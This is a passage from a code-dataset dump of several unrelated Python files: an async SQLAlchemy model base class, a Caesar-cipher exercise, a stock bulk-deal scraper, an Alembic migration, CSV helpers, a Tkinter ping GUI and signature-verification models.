sqlalchemy.dialects.postgresql import JSONB, ARRAY\nfrom sqlalchemy.sql.elements import ClauseElement\nfrom sqlalchemy import func\n\nfrom . import utils, exceptions, aviews, sql_literals\n\n\nclass ConnectionLogger:\n logger = logging.getLogger('common.db')\n\n def __init__(self, connection):\n self._connection = connection\n\n def log(self, sql):\n if not self.logger.hasHandlers():\n return\n elif isinstance(sql, str):\n s = sql\n else:\n s = sql.compile(\n dialect=sql_literals.LiteralDialect(),\n compile_kwargs={\"literal_binds\": True},\n )\n self.logger.debug(s)\n\n def execute(self, sql, *args, **kwargs):\n self.log(sql)\n return self._connection.execute(sql, *args, **kwargs)\n\n def scalar(self, sql, *args, **kwargs):\n self.log(sql)\n return self._connection.scalar(sql, *args, **kwargs)\n\n\ndef get_app_from_parameters(*args, **kwargs):\n app = None\n if kwargs.get('request') is not None:\n app = kwargs['request'].app\n elif args and (isinstance(args[0], (MetaModel, Model, Request)) or hasattr(args[0], 'app')):\n app = args[0].app\n return app\n\n\ndef method_connect_once(arg):\n def with_arg(func):\n @functools.wraps(func)\n async def wrapper(*args, **kwargs):\n if kwargs.get('connection') is None:\n app = get_app_from_parameters(*args, **kwargs)\n async with app['db'].acquire() as connection:\n kwargs['connection'] = connection\n return await func(*args, **kwargs)\n else:\n return await func(*args, **kwargs)\n return wrapper\n\n if not callable(arg):\n return with_arg\n return with_arg(arg)\n\n\ndef method_redis_once(arg):\n redis = 'redis'\n\n def with_arg(func):\n @functools.wraps(func)\n async def wrapper(*args, **kwargs):\n if kwargs.get(redis) is None:\n app = get_app_from_parameters(*args, **kwargs)\n async with app[redis].get() as connection:\n kwargs[redis] = connection\n return await func(*args, **kwargs)\n else:\n return await func(*args, **kwargs)\n return wrapper\n\n if not callable(arg):\n redis = arg\n return with_arg\n\n return with_arg(arg)\n\n\nclass MetaModel(ABCMeta):\n def __new__(mcls, name, bases, namespace):\n cls = ABCMeta.__new__(mcls, name, bases, namespace)\n name = utils.convert_class_name(name)\n cls.models[name] = cls\n return cls\n\n\nclass Model(dict, metaclass=MetaModel):\n models = {}\n app = None\n primary_key = 'id'\n validators = ()\n fields_permanent = () # Fields need to be saved\n fields_readonly = ()\n fields_list = ()\n fields_one = None\n\n @classmethod\n def factory(cls, app):\n return type(cls.__name__, (cls,), {'app': app})\n\n def copy_object(self):\n cls = type(self)\n obj = cls(\n (n, v)\n for n, v in dict.items(self)\n if not isinstance(v, ClauseElement))\n return obj\n\n def pretty(self):\n return json.dumps(self, indent=3, cls=aviews.JsonEncoder)\n\n @property\n def pk(self):\n return self.get(self.primary_key)\n\n @pk.setter\n def pk(self, value):\n self[self.primary_key] = value\n\n def __getattr__(self, item):\n if item in self:\n return self[item]\n return getattr(super(), item)\n\n def __setattr__(self, key, value):\n if key == 'pk':\n key = self.primary_key\n self[key] = value\n\n @classmethod\n def _where(cls, args):\n if not args:\n raise ValueError('Where where?')\n elif isinstance(args[0], (int, str, uuid.UUID)):\n first, *tail = args\n args = [cls.table.c[cls.primary_key] == first]\n args.extend(tail)\n return reduce(and_, args),\n\n @classmethod\n def to_column(cls, fields):\n t = cls.table.c\n result = []\n for f in fields:\n if isinstance(f, str):\n f = getattr(t, f)\n result.append(f)\n return result\n\n @classmethod\n def set_defaults(cls, data: dict):\n pass\n\n @classmethod\n async def _get_one(cls, *args, connection=None, fields=None):\n args = cls._where(args)\n if fields:\n fields = cls.to_column(fields)\n elif cls.fields_one:\n fields = cls.to_column(cls.fields_one)\n\n if fields:\n sql = sa.select(fields).select_from(cls.table)\n else:\n sql = cls.table.select()\n\n result = await connection.execute(sql.where(*args))\n return await result.first()\n\n @classmethod\n @method_connect_once\n async def get_one(cls, *args, connection=None, fields=None, silent=False):\n \"\"\"\n Extract by id\n \"\"\"\n r = await cls._get_one(*args, connection=connection, fields=fields)\n if r:\n return cls(**r)\n elif not silent:\n raise exceptions.NotFound()\n\n @method_connect_once\n async def load_fields(self, *fields, connection, force_update=False):\n fields = set(fields)\n if force_update is False:\n fields = fields - set(self)\n elif isinstance(force_update, (list, tuple)):\n fields = fields.union(force_update)\n\n if fields:\n r = await self._get_one(\n *self._where([self.pk]),\n connection=connection,\n fields=fields)\n dict.update(self, r)\n\n @classmethod\n @method_connect_once\n async def get_list(cls, *args, connection, fields=None,\n offset=None, limit=None, sort=None,\n select_from=None):\n \"\"\"Extract list\"\"\"\n if fields:\n fields = cls.to_column(fields)\n elif cls.fields_list:\n fields = cls.to_column(cls.fields_list)\n\n if fields:\n sql = sa.select(fields).select_from(cls.table)\n else:\n sql = cls.table.select()\n\n for i in select_from or ():\n sql = sql.select_from(i)\n\n if args and args[0] is not None:\n sql = sql.where(reduce(and_, args))\n\n if offset is not None:\n sql = sql.offset(offset)\n\n if limit is not None:\n sql = sql.limit(limit)\n\n if isinstance(sort, str):\n sql = sql.order_by(sort)\n elif sort:\n sql = sql.order_by(*sort)\n\n result = await connection.execute(sql)\n l = []\n async for row in result:\n l.append(cls(**row))\n return l\n\n @classmethod\n @method_connect_once\n async def get_dict(cls, *where_and, connection=None,\n fields=None, sort=None, **kwargs):\n where = []\n if where_and:\n if isinstance(where_and[0], (list, tuple, str, int)):\n v, *where_and = where_and\n kwargs[cls.primary_key] = v\n for k, v in kwargs.items():\n if isinstance(v, (list, tuple)):\n if v:\n where.append(cls.table.c[k].in_(v))\n else:\n where.append(cls.table.c[k] == v)\n\n where.extend(where_and)\n if where:\n where = (reduce(and_, where),)\n else:\n where = ()\n if not fields:\n fields = None\n elif cls.primary_key not in fields:\n fields.append(cls.primary_key)\n l = await cls.get_list(\n *where, connection=connection,\n sort=sort, fields=fields)\n return {i.pk: i for i in l}\n\n @classmethod\n def get_table_from_django(cls, model, *jsonb, **field_type):\n options = model._meta\n fields = []\n for f in options.get_fields():\n i = f.name\n if i in jsonb:\n fields.append((i, JSONB))\n elif i in field_type:\n fields.append((i, field_type[i]))\n elif f.many_to_one:\n fields.append((f.column,))\n elif f.related_model is not None:\n continue\n else:\n fields.append((i,))\n return sa.table(options.db_table, *[sa.column(*f) for f in fields])\n\n @classmethod\n @method_connect_once\n async def _pg_scalar(cls, sql, connection=None):\n return await connection.scalar(sql)\n\n @classmethod\n @method_redis_once\n async def get_count(cls, *args, postfix=None, connection=None, redis=None):\n \"\"\"\n Extract query size\n \"\"\"\n sql = cls.table.count()\n\n if args:\n sql = sql.where(reduce(and_, args))\n\n if not postfix:\n postfix = utils.get_hash(\n str(sql.compile(compile_kwargs={\"literal_binds\": True})))\n\n key = cls.app.name + ':count:' if cls.app and hasattr(cls.app, 'name') else 'count:'\n key += postfix\n\n count = await redis.get(key)\n if count is not None:\n return int(count)\n\n count = await cls._pg_scalar(sql=sql, connection=connection)\n await redis.set(key, count)\n await redis.expire(key, 3 * 60)\n\n return count\n\n @classmethod\n @method_connect_once\n @method_redis_once\n async def get_sum(cls, column, where, postfix=None, delay=0,\n connection=None, redis=None):\n \"\"\"Calculates sum\"\"\"\n sql = sa.select([func.sum(cls.table.c[column])]).where(where)\n\n if not postfix:\n postfix = utils.get_hash(\n str(sql.compile(compile_kwargs={\"literal_binds\": True})))\n\n key = cls.app.name + ':aggregate:sum:' if cls.app and hasattr(cls.app, 'name') else 'aggregate:sum:'\n key += postfix\n\n if delay:\n count = await redis.get(key)\n if count is not None:\n return int(count)\n\n count = await cls._pg_scalar(sql=sql, connection=connection)\n\n if count is None:\n count = 0\n elif delay:\n await redis.set(key, count)\n await redis.expire(key, delay)\n\n return count\n\n @classmethod\n @method_connect_once\n async def create(cls, *, connection, **kwargs):\n \"\"\"Inserts new object\"\"\"\n pk = cls.table.c[cls.primary_key]\n cls.set_defaults(kwargs)\n uid = await connection.scalar(\n cls.table.insert().returning(pk).values(kwargs))\n kwargs[cls.primary_key] = uid\n return cls(**kwargs)\n\n @method_connect_once\n async def save(self, *, fields=None, connection):\n pk_field = self.table.c[self.primary_key]\n self.set_defaults(self)\n if self.primary_key in self:\n saved = await self._get_one(self.pk, connection=connection)\n else:\n saved = False\n if not saved:\n pk = await connection.scalar(\n self.table.insert().returning(pk_field).values(self))\n self[self.primary_key] = pk\n return pk\n if fields:\n fields = list(itertools.chain(fields, self.fields_permanent))\n values = {k: v for k, v in self.items()\n if k in fields}\n elif self.fields_readonly:\n values = {k: v for k, v in self.items()\n if k not in self.fields_readonly}\n else:\n values = self\n pk = await connection.scalar(\n self.table.update()\n .where(pk_field == self.pk)\n .returning(pk_field)\n .values(values)\n )\n assert self.pk == pk\n\n return pk\n\n @method_connect_once\n async def update_increment(self, connection=None, **kwargs):\n t = self.table\n\n dict_update = {\n t.c[field]: t.c[field] + value\n for field, value in kwargs.items()\n }\n\n await connection.execute(\n t.update().where(\n t.c[self.primary_key] == self.pk\n ).values(dict_update))\n\n @classmethod\n @method_connect_once\n async def update_fields(cls, where, connection=None, **kwargs):\n t = cls.table\n\n dict_update = {\n t.c[field]: value\n for field, value in kwargs.items()\n }\n\n await connection.execute(\n t.update().\n where(where).\n values(dict_update))\n\n @method_connect_once\n async def update_json(self, *args, connection=None, **kwargs):\n t = self.table\n if args:\n if len(args) > 1 and not kwargs:\n field, *path, value = args\n else:\n field, *path = args\n value = kwargs\n for p in reversed(path):\n value = {p: value}\n kwargs = {field: value}\n elif not kwargs:\n raise ValueError('Need args or kwargs')\n\n await connection.scalar(\n t.update().where(\n t.c[self.primary_key] == self.pk\n ).values(\n {\n t.c[field]: sa.func.coalesce(\n t.c[field], sa.cast({}, JSONB)\n ) + sa.cast(value, JSONB)\n for field, value in kwargs.items()\n }\n ).returning(t.c[self.primary_key]))\n\n @classmethod\n @method_connect_once\n async def delete_where(cls, *where, connection=None):\n t = cls.table\n\n where = cls._where(where)\n\n await connection.execute(\n t.delete().where(*where))\n\n @classmethod\n @method_connect_once\n async def get_or_create(cls, *args, defaults=None, connection):\n pk_field = getattr(cls.table.c, cls.primary_key)\n if args:\n pass\n elif cls.primary_key in defaults:\n args = (defaults[cls.primary_key],)\n\n if args:\n saved = await cls._get_one(*args, connection=connection)\n if saved:\n return saved, False\n\n pk = await connection.scalar(\n cls.table.insert().returning(pk_field).values(defaults))\n obj = cls(**defaults)\n obj.pk = pk\n return obj, True\n\n @classmethod\n def validate(cls, data):\n \"\"\"Returns valid object or exception\"\"\"\n validators = cls.validators or [cls.default_validator]\n for validator in validators:\n data = validator(data)\n return cls(**data)\n\n @classmethod\n def default_validator(cls, data):\n return {f: data.get(f) for f in cls.table.columns.keys()}\n\n\nclass AppModels:\n \"\"\"\n Class to managing all models of application\n \"\"\"\n def __init__(self, app):\n self.app = app\n\n def __getitem__(self, item):\n if hasattr(self, item):\n return getattr(self, item)\n return KeyError()\n\n def __getattr__(self, item):\n if item in Model.models:\n sub_class = Model.models[item].factory(self.app)\n setattr(self, item, sub_class)\n return sub_class\n raise AttributeError()\n\n @staticmethod\n def import_all_models(apps_path):\n \"\"\"Imports all the models from apps_path\"\"\"\n utils.import_module_from_all_apps(apps_path, 'amodels')\n\n @staticmethod\n def import_all_models_from_packages(package):\n \"\"\"Import all the models from package\"\"\"\n utils.import_modules_from_packages(package, 'amodels')\n","sub_path":"dvhb_hybrid/amodels.py","file_name":"amodels.py","file_ext":"py","file_size_in_byte":15616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"348370036","text":"# Capturar do terminal 3 argumentos\n# um que sera uma palavra, outro que sera um comando para criptografar ou decriptar\n# outro que sera a chave da criptografia\n\n# ex: python pedro encrypt 1\n# saida: qfesp\n# terminal: ./script.py mensagem cript/decript chave\n\nimport sys\n\nalphabet = list('abcdefghijklmnoprstuvwxyz')\n\nmessage = list(sys.argv[1])\ncommand = sys.argv[2]\nkey = int(sys.argv[3])\n\n\ndef decrypt(message, key):\n decryptedWord = []\n\n for character in message:\n charOnAlphabet = alphabet.index(character)\n\n if (charOnAlphabet + key) >= len(alphabet):\n returnedCharAlphabet = len(alphabet) - (charOnAlphabet + key)\n decryptedWord.append(alphabet[returnedCharAlphabet])\n\n else:\n decryptedWord.append(alphabet[charOnAlphabet - key])\n return decryptedWord\n\n\ndef encrypt(message, key):\n encryptedWord = []\n\n for character in message:\n charOnAlphabet = alphabet.index(character)\n\n if (charOnAlphabet + key) >= len(alphabet):\n returnedCharAlphabet = len(alphabet) - (charOnAlphabet + key)\n encryptedWord.append(alphabet[returnedCharAlphabet])\n\n else:\n encryptedWord.append(alphabet[charOnAlphabet + key])\n\n return encryptedWord\n\n\nfor character in message:\n if command == 'encrypt':\n result = encrypt(message, key)\n\n if command == 'decrypt':\n result = decrypt(message, key)\n\nprint('Texto:')\nprint(''.join(result))\n","sub_path":"exercicios/criptografia.py","file_name":"criptografia.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"161541339","text":"import os\nfrom share.constants import Config\n\n\ndef run_command(filename, directory):\n jar_path = Config.PROJECT_DIR + Config.MUSIC_JAR\n command = 'java -cp {}: Main {} {}'.format(jar_path, filename, directory)\n print(\"command=\", command)\n r = os.popen(command)\n info = r.readlines()\n print(info)\n return info\n\n\nif __name__ == \"__main__\":\n run_command('/Users/123/Documents/web_projects/emow/code/emow/upload/wav/wistful4_test.wav',\n '/Users/123/Documents/web_projects/emow/code/emow/wavfiles/Test/positive/')","sub_path":"share/run_command.py","file_name":"run_command.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"168128641","text":"import urllib.request as req\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n#market = 'NSE'\ndef getBulkDeals(market):\n url = \"http://www.moneycontrol.com/stocks/marketstats/blockdeals/\" + market.lower()\n try:\n page = req.urlopen(url)\n soup = BeautifulSoup(page,\"html.parser\")\n table=soup.find(text=\"Company\").find_parent(\"table\")\n\n d = []\n for row in table.findAll(\"tr\")[2:]:\n line = [cell.get_text(strip=True) for cell in row.findAll(\"td\")]\n sym = line[1]\n typ = line[3]\n qty = line[4]\n #print(sym,typ,qty)\n d.append({'Symbol': sym, 'Type': typ, 'Qty': qty})\n\n pd.DataFrame(d)\n\n s = {}\n for r in d:\n sym = r['Symbol']\n typ = r['Type']\n qty = r['Qty']\n if typ =='Buy':\n qty = qty\n else:\n qty = int(qty) * -1\n #print(sym + ':' + str(qty))\n s.setdefault(sym,{'Qty':0})\n s[sym]['Qty'] += int(qty)\n\n print('\\nStocks traded with significant bulkdeals in ' + market.upper() + ':\\n')\n for key in s:\n if abs(s[key]['Qty']) > 50000:\n print(key,'=>',s[key]['Qty'])\n except:\n print('Error occurred while retrieving bulk deals in %s!' %(market.upper()))\n\n","sub_path":"old/BulkDeals.py","file_name":"BulkDeals.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"308908636","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/9/8 20:44\n# @Author : heyee (jialeyang)\n\n# -*- coding: utf-8 -*-\n# @Time : 2021/9/7 15:50\n# @Author : heyee (jialeyang)\n\nimport os.path as osp\nimport os\nfrom collections import defaultdict\nimport json\nfrom eval_performance import *\nfrom tqdm import tqdm\nimport pandas as pd\nfrom collections import Counter\n\ntqdm.pandas()\n\n\nclass AnalysisFrq:\n\n def __init__(self):\n self.frq_dict = defaultdict()\n\n def count_frq(self, data):\n res = Counter(data)\n res_dict = dict(res)\n res_dict2 = dict(sorted(res_dict.items(), key=lambda item: item[1], reverse=True))\n # out_file = ''\n # fout = open(out_file, 'w', encoding='utf-8')\n # json.dump(res_dict2, fout, ensure_ascii=False, indent=4)\n with open('/Users/apple/XHSworkspace/data/structure/food/dataset/frq_ana/笔记query_frq_ana.json', 'w', encoding='utf-8') as fp:\n json.dump(res_dict2, fp, ensure_ascii=False, indent=4)\n print(data)\n\n def read_file(self, file):\n \"\"\" file format: note_id \\t\\t property \\t\\t note\n \"\"\"\n with open(file, 'r', encoding='utf-8') as reader:\n tmp = reader.read()\n lines = tmp.split(\"\\n\")\n return [w for w in lines if len(w) > 0]\n\n def write_file(self, file, data):\n with open(file, 'w', encoding='utf-8') as writer:\n for parsed_text in data:\n if isinstance(parsed_text, str) and len(parsed_text) > 0:\n writer.write(f'{parsed_text}\\n')\n else:\n print(parsed_text)\n\n\nif __name__ == '__main__':\n ana = AnalysisFrq()\n dir_path = \"/Users/apple/XHSworkspace/data/structure/food/dataset/frq_ana\"\n data = ana.read_file(\n osp.join(dir_path, \"000000_0_res2\"))\n # data = pd.read_csv(osp.join(dir_path, \"美食query.csv_10000_res\"),\n # error_bad_lines=False,\n # header=None)\n data2 = []\n for i in data:\n data2.extend(i.split(\"\\t\"))\n ana.count_frq(data=data2)\n print(\"hi\")\n","sub_path":"entity_extractor/data_scripts/analysis_frq.py","file_name":"analysis_frq.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"525680671","text":"#\n#\n# @param x int整型\n# @return bool布尔型\n#\nclass Solution:\n def isPalindrome(self , x):\n if x < 0: return False\n temp = x\n y = 0\n while temp != 0:\n y = y*10 + temp%10\n temp = temp//10\n if y == x: return True\n else: return False\n\nif __name__ == '__main__':\n x = 193794287\n s = Solution()\n ans = s.isPalindrome(x)\n print(ans)\n","sub_path":"palindrome_number.py","file_name":"palindrome_number.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"202948430","text":"#\n# Copyright (C) 2018 Red Hat, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"Add analytics\n\nRevision ID: 46fa9eb61235\nRevises: bcd903a35145\nCreate Date: 2018-08-10 13:51:24.538380\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '46fa9eb61235'\ndown_revision = 'bcd903a35145'\nbranch_labels = None\ndepends_on = None\n\nimport datetime\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql as pg\nimport sqlalchemy_utils as sa_utils\n\nfrom dci.common import utils\n\n\ndef upgrade():\n\n op.create_table(\n 'analytics',\n sa.Column('id', pg.UUID(as_uuid=True), primary_key=True,\n default=utils.gen_uuid),\n sa.Column('created_at', sa.DateTime(),\n default=datetime.datetime.utcnow, nullable=False),\n sa.Column('updated_at', sa.DateTime(),\n onupdate=datetime.datetime.utcnow,\n default=datetime.datetime.utcnow, nullable=False),\n sa.Column('etag', sa.String(40), nullable=False,\n default=utils.gen_etag,\n onupdate=utils.gen_etag),\n sa.Column('team_id', pg.UUID(as_uuid=True),\n sa.ForeignKey('teams.id', ondelete='CASCADE'),\n nullable=False),\n sa.Index('analytics_team_id_idx', 'team_id'),\n sa.Column('job_id', pg.UUID(as_uuid=True),\n sa.ForeignKey('jobs.id', ondelete='CASCADE'),\n nullable=False),\n sa.Index('analytics_job_id_idx', 'job_id'),\n sa.Column('type', sa.String(255), nullable=False),\n sa.Column('name', sa.String(255), unique=False, nullable=False),\n sa.Index('analytics_name_team_id_idx', 'name', 'team_id',\n unique=True),\n sa.Column('url', sa.String(255)),\n sa.Column('data', sa_utils.JSONType, default={}, nullable=False)\n )\n\n\ndef downgrade():\n pass\n","sub_path":"dci/alembic/versions/46fa9eb61235_add_analytics.py","file_name":"46fa9eb61235_add_analytics.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"528362393","text":"import os\nimport errno\nimport csv\nimport time\n\ndef init_csv(filename):\n \n csvfile = open(filename, 'a')\n csvwriter = csv.writer(csvfile, delimiter = ';', quotechar = '\"', quoting=csv.QUOTE_MINIMAL)\n csvwriter.writerow([''])\n csvwriter.writerow([''])\n csvwriter.writerow(['New Training started at %g '%time.time()])\n csvwriter.writerow([''])\n return csvfile, csvwriter\n \ndef init_train_csv(filename):\n csvfile, csvwriter = init_csv(filename)\n csvwriter.writerow(['Loss Function'] + ['Iterations'] + ['Epochs'] + ['Training Accuracy'] + ['Computation Time'])\n csvfile.close()\n# return csvfile, csvwriter\n \ndef init_test_csv(filename):\n csvfile, csvwriter = init_csv(filename)\n csvwriter.writerow(['Loss Function'] + ['Iterations'] + ['Epochs'] + ['Testing Accuracy'] + ['Computation Time'])\n csvfile.close()\n# return csvfile, csvwriter\n \n# Open a csv file, write a row at the end of it, and close it\ndef csv_writerow(csv_file, row):\n \n with open(csv_file, 'a') as f:\n writer = csv.writer(f, delimiter = ';', quotechar = '\"', quoting=csv.QUOTE_MINIMAL)\n writer.writerow(row)\n \n# This function creates a path if it doesn't already exist\ndef make_sure_path_exists(path):\n try:\n os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise","sub_path":"AlexNet_cifar10/csv_export.py","file_name":"csv_export.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"401050911","text":"from tkinter import *\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter.messagebox import *\nfrom ping.ping import *\n\nimport time\n\n#Devuelve un string con el tiempo actual seguido de :\ndef get_strtime():\n return time.strftime(\"%H:%M:%S\")+\":\"\n\n#Clase que establece la interfaz de usuario de la unitilidad conexion.\nclass ventana_ping:\n def __init__(self,v0):\n self.root = v0;\n self.ventana = Toplevel(self.root)\n self.ventana.resizable(0,0)\n self.ventana.wm_title(\"Conexiones pasiva v4\")\n self.textohoras = StringVar()\n self.textohoras.set(get_strtime()[0:-1])\n self.textohoraslabel = Label(self.ventana,textvar=self.textohoras,anchor=W,width=40,pady=3).grid(row=1,column=1)\n self.textoatencion = StringVar()\n self.textoatencion.set(\"Aceptar condiciones en la primera ejecucion.\")\n self.textoatencionlabel = Label(self.ventana,textvar=self.textoatencion,anchor=W,width=40,pady=3).grid(row=1,column=2)\n self.textoip = StringVar()\n self.textoip.set(\"Maquina:\")\n self.labeltextoip=Label(self.ventana,textvar = self.textoip,anchor=W,width=35,pady=3).grid(row=2,column=1)\n self.inputipstr = StringVar()\n self.inputip = Entry(self.ventana,textvar=self.inputipstr,width=40).grid(row=3,column=1)\n\n self.textotoutdump = StringVar()\n self.textotoutdump.set(\"Numero de paquetes:\")\n self.labeltextotoutdump=Label(self.ventana,textvar = self.textotoutdump,anchor=W,width=35,pady=3).grid(row=4,column=1)\n self.inputtodumpstr = StringVar()\n self.inputtodumpstr.set(\"5\")\n self.inputtodump = Entry(self.ventana,textvar=self.inputtodumpstr,width=40).grid(row=5,column=1)\n\n self.textopaquetes = StringVar()\n self.textopaquetes.set(\"Paquetes\")\n self.labeltextopaquetes=Label(self.ventana,textvar = self.textopaquetes,width=35,pady=3).grid(row=6,column=1)\n self.textoenviados = StringVar()\n self.textoenviados.set(\"Enviados:\")\n self.labeltextoenviados=Label(self.ventana,textvar = self.textoenviados,anchor=W,width=35,pady=3).grid(row=7,column=1)\n self.textorecibidos = StringVar()\n self.textorecibidos.set(\"Recibidos:\")\n self.labeltextorecibidos=Label(self.ventana,textvar = self.textorecibidos,anchor=W,width=35,pady=3).grid(row=8,column=1)\n self.textoerror = StringVar()\n self.textoerror.set(\"Error:\")\n self.labeltextoerror=Label(self.ventana,textvar = self.textoerror,anchor=W,width=35,pady=3).grid(row=9,column=1)\n self.textoperdidos = StringVar()\n self.textoperdidos.set(\"Perdidos:\")\n self.labeltextoperdidos=Label(self.ventana,textvar = self.textoperdidos,anchor=W,width=35,pady=3).grid(row=10,column=1)\n\n self.textortt = StringVar()\n self.textortt.set(\"RTTs (ms)\")\n self.labeltextortt=Label(self.ventana,textvar = self.textortt,width=35,pady=3).grid(row=6,column=2)\n self.textominimo = StringVar()\n self.textominimo.set(\"Minimo:\")\n self.labeltextominimo=Label(self.ventana,textvar = self.textominimo,anchor=W,width=35,pady=3).grid(row=7,column=2)\n self.textomedia = StringVar()\n self.textomedia.set(\"Media:\")\n self.labeltextomedia=Label(self.ventana,textvar = self.textomedia,anchor=W,width=35,pady=3).grid(row=8,column=2)\n self.textomaximo = StringVar()\n self.textomaximo.set(\"Maximo:\")\n self.labeltextomaximo=Label(self.ventana,textvar = self.textomaximo,anchor=W,width=35,pady=3).grid(row=9,column=2)\n self.textoderiv = StringVar()\n self.textoderiv.set(\"Derivacion:\")\n self.labeltextoderiv=Label(self.ventana,textvar = self.textoderiv,anchor=W,width=35,pady=3).grid(row=10,column=2)\n\n self.botonejecutar = Button(self.ventana,text=\"Iniciar\",command=lambda: self.conectar(), width=10).grid(row = 11, column=2)\n self.log = StringVar()\n self.labellog = Label(self.ventana,textvar=self.log, anchor=W, width=40).grid(row=11,column=1)\n\n #Funcion que se ejecuta al pulsar el boton de conectar.\n def conectar(self):\n maquina = self.inputipstr.get()\n if(maquina.isspace()) or (maquina == \"\"):\n self.log.set(get_strtime()+\"Error, introduce una maquina\")\n self.root.update_idletasks()\n return\n if(self.inputtodumpstr.get().isspace()) or (self.inputtodumpstr.get() == \"\"):\n paquetes = \"4\"\n else:\n paquetes = self.inputtodumpstr.get()\n print(\"Maquina: \"+maquina)\n print(\"Paquetes: \"+paquetes)\n statistics = get_ping_statistics(maquina,paquetes)\n print(statistics)\n try:\n self.textoenviados.set(\"Enviados: \"+statistics[\"enviados\"])\n self.textorecibidos.set(\"Recibidos: \"+statistics[\"recibidos\"])\n self.textoerror.set(\"Error: \"+statistics[\"error\"])\n self.textoperdidos.set(\"Perdidos: \"+statistics[\"perdidos\"])\n self.textominimo.set(\"Minimo: \"+statistics[\"minimo\"])\n self.textomedia.set(\"Media: \"+statistics[\"media\"])\n self.textomaximo.set(\"Maximo: \"+statistics[\"maximo\"])\n self.textoderiv.set(\"Derivacion: \"+statistics[\"desviacion\"])\n self.log.set(get_strtime()+\" Ejecutado con exito.\")\n self.root.update_idletasks()\n except KeyError:\n self.log.set(get_strtime()+\" Error al ejecutar el ping.\")\n self.root.update_idletasks()\n","sub_path":"herramientas/ping_ui/ping_ui.py","file_name":"ping_ui.py","file_ext":"py","file_size_in_byte":5454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"559077877","text":"\nimport json\nimport pickle\nimport ast\n\nfrom app.extensions import db\nfrom random import choice\nfrom string import ascii_letters\nfrom flask_jwt import current_user\nfrom multiprocessing import Pool\nfrom sklearn.svm import SVC\n\n\nclass Person(db.Model):\n __tablename__ = 'people'\n id = db.Column(db.Integer, primary_key=True)\n uid = db.Column(db.String(80), unique=True)\n email = db.Column(db.String(120), unique=True)\n first_name = db.Column(db.String(80))\n last_name = db.Column(db.String(80))\n creator_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n creator = db.relationship('User')\n is_active = db.Column(db.Integer(1), default=True)\n is_sealed = db.Column(db.Integer(1), default=False)\n\n reference_singatures = db.relationship('ReferenceSignature')\n dtw_char = db.relationship('DtwCharacteristics')\n svm_instances = db.relationship('SvmInstance')\n\n def __init__(self, first_name, last_name, email, creator=current_user):\n self.first_name = first_name\n self.last_name = last_name\n self.email = email\n self.creator = creator\n\n def __repr__(self):\n return '' % self.first_name\n\n @staticmethod\n def create(first_name, last_name, email, creator=current_user):\n if not Person.query.filter_by(**{'email': email}).first():\n person = Person(first_name=first_name, last_name=last_name, email=email, creator=creator)\n db.session.add(person)\n db.session.commit()\n person.uid = \"\".join([choice(ascii_letters) for _ in range(20-len(str(person.id)))])+'_'+str(person.id)\n db.session.add(person)\n db.session.commit()\n else:\n raise Exception(\"Email Already Taken\")\n return person\n\n def update(self, first_name, last_name, email, creator=current_user):\n\n self.first_name = first_name\n self.last_name = last_name\n self.email = email\n self.creator = creator\n db.session.add(self)\n db.session.commit()\n return self.uid\n\n def delete(self):\n self.is_active = False\n db.session.add(self)\n db.session.commit()\n\n def to_json2(self):\n \"\"\"Returns a json representantion of the user.\n :returns: a json object.\n \"\"\"\n\n return {\n 'id': str(self.id),\n 'uid': str(self.uid),\n 'first_name': self.first_name,\n 'last_name': self.last_name\n }\n\n\nclass ReferenceSignature(db.Model):\n __tablename__ = 'reference_signature'\n id = db.Column(db.Integer, primary_key=True)\n owner_id = db.Column(db.Integer, db.ForeignKey('people.id'))\n owner = db.relationship('Person')\n signature = db.Column(db.Text)\n\n def __init__(self, owner, signature_array):\n self.owner = owner\n self.signature = json.dumps(signature_array)\n\n @staticmethod\n def create(owner:Person, signature_array):\n if not owner.is_sealed and owner.is_active:\n reference_signature = ReferenceSignature(owner=owner, signature_array=signature_array)\n db.session.add(reference_signature)\n db.session.commit()\n DtwCharacteristics.create(owner)\n return reference_signature\n raise SealException(\"Person is sealed\")\n\n @property\n def signature_dtw_feature(self):\n from app.DynamicTimeWarping.DTW import fetch_features\n signature = ast.literal_eval(self.signature)\n features = fetch_features(signature)\n return features\n\n def to_json2(self):\n \"\"\"Returns a json representantion of the user.\n :returns: a json object.\n \"\"\"\n\n return {\n 'id': str(self.id),\n 'signature': self.signature\n }\n\n\nclass DtwCharacteristics(db.Model):\n __tablename__ = 'dtw_chars'\n id = db.Column(db.Integer, primary_key=True)\n\n owner_id = db.Column(db.Integer, db.ForeignKey('people.id'))\n owner = db.relationship('Person')\n\n min_mean = db.Column(db.Float)\n 